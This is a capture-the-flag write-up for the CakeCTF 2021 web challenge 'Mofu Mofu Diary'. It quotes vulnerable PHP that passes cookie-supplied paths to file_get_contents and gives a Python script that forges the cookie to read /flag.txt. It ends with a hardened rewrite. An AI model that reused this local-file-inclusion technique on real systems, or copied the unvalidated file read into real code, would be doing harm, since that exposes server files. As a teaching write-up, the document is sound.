# [Web] Mofu Mofu Diary - Cake CTF 2021

###### tags: `CakeCTF 2021`

The source code is small, so just read it. `util.php` has quite a bit going on:

```php
<?php
function img2b64($image) {
    // Reads whatever path it is given and inlines it as a data: URI
    return 'data:jpg;base64,'.base64_encode(file_get_contents($image));
}

function get_cached_contents() {
    $results = [];
    if (empty($_COOKIE['cache'])) {
        // snip
    } else {
        // The whole catalogue (names + descriptions + expiry) comes from the client cookie
        $cache = json_decode($_COOKIE['cache'], true);
        if ($cache['expiry'] <= time()) {
            $expiry = time() + 60*60*24*7;
            for($i = 0; $i < count($cache['data']); $i++) {
                $result = $cache['data'][$i];
                // Each client-supplied name is read from disk on cache refresh
                $_SESSION[$result['name']] = img2b64($result['name']);
            }
            $cookie = array('data' => $cache['data'], 'expiry' => $expiry);
            setcookie('cache', json_encode($cookie), $expiry);
        }
        return $cache['data'];
    }
    return $results;
}
?>
```

So the image data and descriptions are kept in a cookie named `cache`. Whether that cache is still valid is decided by `expiry`; once it has expired, the data is re-read from disk.

Now look at `img2b64`: the path taken from `cache` is passed straight to `file_get_contents`. That looks like **LFI**.

Take the `cache` value, set `expiry` to a value in the past, and change the `name` of any image to `/flag.txt` or similar; the base64 of that file should then come back.

The payload is built like this:

```python
import urllib.parse
import json

# The original cache cookie as captured from the browser (URL-encoded JSON)
data = """
%7B%22data%22%3A%5B%7B%22name%22%3A%22%5C%2Fflag.txt%22%2C%22description%22%3A%22cute%20cat%22%7D%2C%7B%22name%22%3A%22images%5C%2F02.jpg%22%2C%22description%22%3A%22When%20you%20gaze%20into%20the%20cat%2C%20the%20cat%20gazes%20into%20you%22%7D%2C%7B%22name%22%3A%22images%5C%2F03.jpg%22%2C%22description%22%3A%22Fox%20villege%20%3A%29%22%7D%2C%7B%22name%22%3A%22images%5C%2F04.jpg%22%2C%22description%22%3A%22TV%20cat%22%7D%2C%7B%22name%22%3A%22images%5C%2F05.jpg%22%2C%22description%22%3A%22Smiling%20emu%22%7D%2C%7B%22name%22%3A%22images%5C%2F06.jpg%22%2C%22description%22%3A%22This%20lemur%20often%20sits%20someone%27s%20shoulder%22%7D%2C%7B%22name%22%3A%22images%5C%2F07.jpg%22%2C%22description%22%3A%22Capybara%20is%20not%20as%20fluffy%20as%20you%20may%20imagine%22%7D%2C%7B%22name%22%3A%22images%5C%2F08.jpg%22%2C%22description%22%3A%22There%20were%20several%20serval%20cats%22%7D%2C%7B%22name%22%3A%22images%5C%2F09.jpg%22%2C%22description%22%3A%22Neko%20cafe%20%40%20Akihabara%22%7D%5D%2C%22expiry%22%3A1629989268%7D
"""

# Decode the cookie into a dict, force a refresh, and point the first entry at the flag
data = json.loads(urllib.parse.unquote(data))
print(data)
data["expiry"] = 0
data["data"][0] = {"name": "/flag.txt", "description": "cute cat"}
print(urllib.parse.quote(json.dumps(data)))
```
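For comparison, here is how the same functions could have been written so the cookie cannot steer `file_get_contents`. This is an added example, not the challenge's code; it assumes a fixed image directory (the hypothetical `IMAGE_DIR`) and keeps the catalogue in the server-side session instead of the cookie.

```php
<?php
// Added hardening example, not the challenge's own code.
// Assumption: all images live directly under IMAGE_DIR.
const IMAGE_DIR = '/var/www/html/images';

// Resolve a user-supplied name to a real file strictly inside IMAGE_DIR,
// or return null. realpath() collapses "..", symlinks and absolute paths.
function safe_image_path(string $name): ?string {
    // Allow only a flat, conservative file name: no slashes, no "..".
    if (!preg_match('/^[A-Za-z0-9_-]+\.(jpg|png)\z/', $name)) {
        return null;
    }
    $base = realpath(IMAGE_DIR);
    $path = realpath(IMAGE_DIR . '/' . $name);
    if ($base === false || $path === false) {
        return null;
    }
    // Prefix check including the separator, so "images2/..." cannot match.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function img2b64_safe(string $name): ?string {
    $path = safe_image_path($name);
    if ($path === null) {
        return null;   // refuse rather than read an arbitrary file
    }
    return 'data:image/jpeg;base64,' . base64_encode(file_get_contents($path));
}

// The catalogue is built from the server's own directory listing and cached
// in $_SESSION; the client only ever holds an opaque session id.
function get_cached_contents_safe(): array {
    if (isset($_SESSION['cache']) && $_SESSION['cache']['expiry'] > time()) {
        return $_SESSION['cache']['data'];
    }
    $data = [];
    foreach (glob(IMAGE_DIR . '/*.jpg') as $file) {
        $name = basename($file);
        $data[] = ['name' => $name, 'image' => img2b64_safe($name)];
    }
    $_SESSION['cache'] = ['data' => $data, 'expiry' => time() + 60*60*24*7];
    return $data;
}
```

With this layout a tampered `expiry` can at most force a harmless refresh, and a `name` such as `/flag.txt` is rejected before any file is opened.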